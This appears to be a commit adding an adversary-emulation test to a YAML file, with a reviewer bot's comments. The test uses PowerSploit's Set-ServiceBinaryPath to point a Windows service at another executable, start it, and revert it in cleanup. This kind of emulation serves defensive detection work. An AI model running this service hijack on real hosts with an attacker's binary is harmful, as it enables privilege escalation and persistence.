Adding T1543.006 Test 6 - Modify Service to Run Arbitrary Binary (Powershell) (#2653)

* Adding T1543.006 Test 6

* Update T1543.003.yaml

---------

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Leo Verlod
2024-01-17 15:44:54 -06:00
committed by GitHub
parent 2723c2f750
commit b8e521c714
+31 -1
@@ -173,4 +173,34 @@ atomic_tests:
sc.exe \\#{remote_host} start #{service_name}
cleanup_command: |
sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
- name: Modify Service to Run Arbitrary Binary (Powershell)
description: |
This test will use PowerShell to temporarily modify a service to run an arbitrary executable by changing its binary path and will then revert the binary path change, restoring the service to its original state.
This technique was previously observed through SnapMC's use of Powerspolit's invoke-serviceabuse function.
[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of the service to modify
type: string
default: fax
new_bin_path:
description: Path of the new service binary
type: String
default: '$env:windir\system32\notepad.exe'
original_bin_path:
description: Path of the original service binary
type: String
default: '$env:windir\system32\fxssvc.exe'
executor:
command: |-
Stop-Service -Name "#{service_name}" -force -erroraction silentlycontinue | Out-Null
set-servicebinarypath -name "#{service_name}" -path "#{new_bin_path}"
start-service -Name "#{service_name}" -erroraction silentlycontinue | out-null
cleanup_command: |-
Stop-Service -Name "#{service_name}" -force -erroraction silentlycontinue | Out-Null
set-servicebinarypath -name "#{service_name}" -path "#{original_bin_path}" -erroraction silentlycontinue | out-null
name: powershell
elevation_required: true
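Review bot: `set-servicebinarypath` in the executor and cleanup is not a built-in Windows cmdlet; it is the `Set-ServiceBinaryPath` function from PowerUp (PowerSploit), so on a stock host the test fails silently and never modifies the service. Either add a `dependencies:` block with a `prereq_command` that checks for the function and a `get_prereq_command` that loads it, or change the binary path with a built-in such as `sc.exe config "#{service_name}" binPath= "#{new_bin_path}"`. Three smaller points in the same hunk: the cleanup stops the service and restores the path but never starts it again, so the service is left stopped rather than "in its original state" as the description claims (either start it in cleanup or soften the description); `type: String` on `new_bin_path` and `original_bin_path` should be lowercase `string` to match `service_name` and the rest of the file; and the description should read "PowerSploit's Invoke-ServiceAbuse function" rather than "Powerspolit's invoke-serviceabuse".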